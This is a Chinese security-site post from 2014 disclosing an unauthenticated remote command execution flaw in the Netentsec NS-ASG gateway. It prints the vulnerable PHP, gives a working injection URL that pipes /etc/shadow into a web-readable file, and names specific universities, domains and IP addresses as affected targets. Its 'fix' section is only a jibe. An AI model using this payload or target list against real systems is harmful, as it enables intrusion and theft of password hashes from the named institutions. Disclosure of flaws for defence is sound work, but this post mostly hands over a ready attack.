网康 NS-ASG 应用安全网关 远程命令执行下载
-
来源:黑吧安全网 浏览:1297次 时间:2014-07-30
无需登录,直接执行远程命令
初步搜索涉及以下单位及学校:
https://vpn.lib.tju.edu.cn
https:// 211.68.223.12
https://221.213.45.231
https://202.113.20.208
https://202.113.49.100/
https://122.226.150.69
https://gljy.cn
等等单位….
漏洞点
<?php
include("include/common.inc");
include("./gadgets/lib/FusionCharts.php");
include("./gadgets/lib/Utilities.php");
//Authenticate($USER_ADMIN);
switch ($action)
{
case "":
list_group("");
break;
case "reboot":
exec("sudo nohup /sbin/reboot &");
list_group("");
break;
case "poweroff":
exec("sudo /sbin/poweroff &");
list_group("");
break;
case "getethinfo":
$rtinfo = getRT($ethx); //这里触发漏洞,跟踪该函数
echo json_encode($rtinfo);
break;
}
function getRT($eth='eth0'){
$result = shell_exec("sudo /sbin/ifconfig $eth"); //这里直接执行了。。。
$ethinfo = array();
preg_match("/RX packets:\d+/",$result,$rtarr);
$ethinfo['rpackets'] = intval(substr($rtarr[0],11));
preg_match("/TX packets:\d+/",$result,$rtarr);
$ethinfo['tpackets'] = intval(substr($rtarr[0],11));
preg_match("/RX bytes:\d+/",$result,$rtarr);
$ethinfo['rbytes'] =intval(substr($rtarr[0],9));
preg_match("/TX bytes:\d+/",$result,$rtarr);
$ethinfo['tbytes'] = intval(substr($rtarr[0],9));
return $ethinfo;
}
验证方式如下:
https://www.xxxxx.com/admin/device_status.php?action=getethinfoðx=a| cat /etc/shadow > /Isc/third-party/httpd/htdocs/test.php
修复方案:
网康的设备是临时工写的么?
上一篇: 创新声卡注册程序本地栈溢出下载